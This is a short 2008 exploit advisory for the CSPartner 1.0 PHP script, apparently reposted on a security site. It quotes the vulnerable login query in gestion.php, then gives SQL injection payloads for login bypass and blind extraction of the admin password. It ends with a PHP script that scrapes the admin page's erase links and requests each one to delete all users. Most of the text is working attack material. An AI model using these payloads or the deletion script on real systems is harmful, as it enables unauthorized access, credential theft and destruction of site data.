CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit
来源:StAkeR[at]hotmail[dot]it 作者:StAkeR 发布时间:2008-10-24
CSPartner 1.0 (Delete All Users/SQL Injection) Remote Exploit ---------------------------------------------------------------- By StAkeR[at]hotmail[dot]it http://www.easy-script.com/scripts-dl/cspartne-01.zip ---------------------------------------------------------------- File gestion.php 5. if(!empty($_POST["pseudo"]) && !empty($_POST["passe"])){ 6. $sql = "SELECT * FROM $tblPartner where pseudo='".$_POST["pseudo"]."' AND password='".$_POST["passe"]."'"; 7. $resultat = mysql_db_query($mydbPartner, $sql); Blind SQL Injection or Login ByPass for you :P Examples: ($_POST['pseudo'] and $_POST['passe']) -1 ' or '1=1 -2 ' or ascii(substring((select password from CSPartner where id=1),1,1))=[97]/* -3 and other :D */
$host = $argv[1] or die("Usage: php [exploit.php] [http://localhost/cms]\n");
if(preg_match_all('/erase=(.+?)"/',file_get_contents($host.'/admin/index.php'),$out)) { for($i=0;$i<=count($out);$i++) { file_get_contents($host.'/admin/index.php?erase='.$out[1][$i]); } echo "[-] All Users Deleted\n"; } else { echo "[-] Exploit Failed!\n"; }
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